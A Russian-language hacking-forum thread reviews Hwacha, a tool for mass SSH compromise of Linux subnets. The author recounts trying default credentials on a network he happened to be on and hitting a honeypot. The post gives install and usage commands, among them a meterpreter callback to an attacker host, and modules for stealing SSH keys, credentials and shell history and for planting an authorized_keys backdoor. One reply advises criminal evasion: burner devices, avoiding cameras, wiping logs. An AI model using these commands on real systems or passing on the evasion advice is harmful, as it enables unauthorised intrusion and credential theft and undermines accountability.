• Paranoid - курс по анонимности и безопасности в сети от команды codeby. Защита персональных данных, анонимность в сети интернет, настройка виртуальных машин, безопасная передача данных, анти форензика и еще много всего полезного. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Статья Hwacha и встреча с honeypot

Vertigo

Lex mea est Vulgate Linux
Red Team
15.02.2017
760
1 922
#1
vertigo1.png
Добрый вечер , Друзья , Уважаемые Форумчане и Гости форума.

Несколько необычное будет сегодня описание инструмента , с которым вас хочу познакомить.
Автором его является N00py . Это человек , который увлекается пентестом.

Hwacha была в очень далёкие времена известна ,как "Огненная повозка" .
И являлась оружием массового поражения пехоты противника.
Сегодня мы видим её реинкарнацию в кибероружие современности ,что не отменяет качеств в многоцелевой атаке.

Hwacha - инструмент быстрый , простой в обращении и был задуман заполнить те пробелы , которые замечены в CrackMapExec.
Но при этом , обладающий уникальным собственным функционалом .
И если CrackMapExec специализируется на Windows в основном , то Hwacha умеет проводить те же атаки ,только на Linux.

И отличается быстротой выполнения полезных нагрузок на таких системах.
Способным собрать артефакты и выполнить shell- код во всей подсети.

Автор обзора и Администрация ресурса предупреждают о запрете использования рассматриваемого инструмента в незаконных целях.
Вся информация предоставлена для ознакомления и изучения проблем безопасности.


Установка Hwacha:
Код:
# git clone https://github.com/n00py/Hwacha.git
# cd Hwacha
# chmod +x hwacha.py
# pip install paramiko
# python hwacha.py - команда запуска.
Примеры запуска:
Код:
python hwacha.py -t 192.168.1.1/24 -u admin  -p password
python hwacha.py -t 192.168.1.100-200 -u admin  -p password -m keys
python hwacha.py -t 192.168.1.100-200 -u admin  -i loot/keys/192.168.1.101/id_rsa -x id
python hwacha.py -t 192.168.1.123 -u admin  -p password -m meterpreter -o "LPORT=4444 LHOST=192.168.1.150 TYPE=64"
Available Modules:
[*] meterpreter Use this to execute a meterpreter agent on the target(s).
REQURED ARGUMENTS: LHOST , LPORT
OPTIONAL ARGUMENTS: TYPE {python, php, 32, 64, osx}
[*] mimipenguin Use this to execute a mimipenguin on the target(s) to recover credentials. (Requires root)
OPTIONAL ARGUMENTS: LHOST, LPORT
[*] keys Use this to collect SSH private keys from the target(s).
[*] history Use this to collect shell history files from the target(s).
[*] privs Use this to enumerate sudo privileges on the targets(s).
[*] backdoor Creates an RSA key pair and adds public key to authorized_keys file on targets(s).
[*] web_delivery Use this to execute a python script on the target(s).
REQURED ARGUMENTS: PATH
OPTIONAL ARGUMENTS: LISTEN
[*] custom_bin Use this to execute a custom binary on the target(s).
REQURED ARGUMENTS: PATH
[*] sudo_exec Use this to execute a custom binary (with sudo) on the target(s).
REQURED ARGUMENTS: PATH
[*] shellcode Use this to execute custom shellcode on the target(s).
REQURED ARGUMENTS: PATH

Рассчитан инструмент на то,что вам известен логин и пароль.
Он может работать с дефолтными данными.
Видим,что ему возможно задать количество хостов в подсети,как и указать саму подсеть.
Не забывайте , что команда с задачей meterpreter-сессии нацелена на Linux-системы.

Мне понравилось , как инструмент справляется с задачами и быстро обрабатывает цели.
Только не всегда выпадает случай , чтобы первое же тестирование на массовость началось со знакомства с honeypot.
И я не мог пройти мимо такого , чтобы не поделиться с вами как это выглядит на самом деле.

Также хочу предостеречь тех ,кто привык работать с большим количеством целей.
Много было разговоров о том, как можно нарваться на honeypot при этом.

Началось всё с того,что я подумал,почему бы не поработать с дефолтными данными в сети, где я находился на тот момент.
И хотел просто вам показать как выглядит положительный результат,когда инструмент демонстрирует авторизацию.
vertigo2.png
Но правилом хорошего тона ,да и безопасности ,является хотя бы минимальная разведка ,с чем имеешь дело.
Вот в чём опасность данного инструмента - он авторизовывается , и "мой IP" попал в список атакующих.
И всегда проверяйте цель , начиная со сбора информации о ней , прежде ,чем тестировать.
vertigo3.png
Сканер Nmap , начал присылать отчёты , которые ему не свойственны.
Да , он определил и сервис в итоге ,который охраняет honeypot по этой подсети.
И перенаправляет атакующего в случае подозрительной активности в ловушку.

Вот на данном этапе ,у меня сразу возникли подозрения.
Как так ,при обычном сканировании цели , вот вам и ключи и много ещё чего ?
vertigo4.png
Здесь матёрый honeypot и не думает маскировать себя.
vertigo5.png
Ну и решил я на него посмотреть в итоге , обратившись к нему через ссылку в nmap
Вот этот мощный красавец.
vertigo6.png
Видим на его странице уведомления о сборе информации , злоумышленниках в сетях и прочее.
Вот его отчёт в графическом изображении , где можно увидеть всю его , отнюдь не гротескность , а величие.
vertigo7.png
Впрочем , можно конечно здесь же атаковать Apache и охраняемый ресурс.
Но , впечатление такое ,что всё-таки это статический крупный и опасный honeypot.

Когда видите при сканировании вот такое , то надеюсь теперь , знаете что делать (бежать надо ))
Здесь видно ,как honeypot фиксирует время и пытается выполнить свои скрипты ,чтобы выжать максимум информации в ответ через nmap.
vertigo8.png

В заключении , рекомендую почитать страницу автора
Для просмотра контента необходимо: Войти или зарегистрироваться

Где вы сможете увидеть увлекательный пример авторского пентеста с применением инструмента Hwacha.

Прошу вас быть осторожными и этичными .
Благодарю вас за внимание , до новых встреч и замечательного всем настроения.
 
Последнее редактирование модератором:

0v3r_Cr1t

Премиум
16.02.2018
156
231
#2
Как по мне много шума и лишних движений наводит =[ Тот про который хани вы написали еще добрый, злые те что ручные, когда группе админов отстук сразу идет и они начинают включаться и уже тебя пытаться поиметь, а те что пишут и инфу собирают пол беды, админчег может очухаться только утром, когда их уже поимели=[
 
Симпатии: Понравилось Vertigo

Vertigo

Lex mea est Vulgate Linux
Red Team
15.02.2017
760
1 922
#3
Тот про который вы написали еще добрый, злые те что ручные[
Лучше переоценить , чем недооценить . Кто его знает ,что за структуры на ним и с какими специалистами.:cool:
Здесь вывод самый главный в том , что могут попасться списки для тестирования ,якобы с валидными данными , а там вот такие сюрпризы)
 

0v3r_Cr1t

Премиум
16.02.2018
156
231
#4
Лучше переоценить , чем недооценить . Кто его знает ,что за структуры на ним и с какими специалистами.:cool:
Здесь вывод самый главный в том , что могут попасться списки для тестирования ,якобы с валидными данными , а там вот такие сюрпризы)
Так если ты видишь полный фарш, весь такой сладкий как медок хостец, то как минимум у здравомыслящего человека должна закрасться мысль а не гон ли это? Далее исследуем и делаем выводы...
Но тут палка о 2х концах
Если ты сидишь через 1разовый девайс и уехал подальше от основной своей локации и не сидишь под камерами в кафе то считаю можно и подолбить не взерая на горшок, но время пребывания в этой сети сократить к минимуму а самое кошерное если работаете в паре, проник, разведал, закрепился, слился и вот тут в дело вступает твой напарник пока ты убиваешь девайсину или просто зачищаешься [чистишь логи в точке, носитель где стоит ось например микросд и прочие телодвижения в виде прогонов оперы] он уже шарится и потрошит и потом зачищает все что можно.
Но скажу так... Нельзя жалеть железо, по этому не стоит покупать дорогое, жалось до добра не доведет...
Как говорит отец одного моего товарища: нельзя жалеть железо [тачки и стволы] Я же применяю данное правило и к девайсам.
 
Симпатии: Понравилось @lex27

Dmitryshod

Премиум
25.12.2017
2
0
#5
Всех приветствую!!! Коллеги, скажите что за honeypot в данной статье?
 

kamaz

Well-known member
14.01.2018
98
17
#7
кароче на бруте все оснавано,даже нелзя файл с моими вариантами юзать
 
Вверх Снизу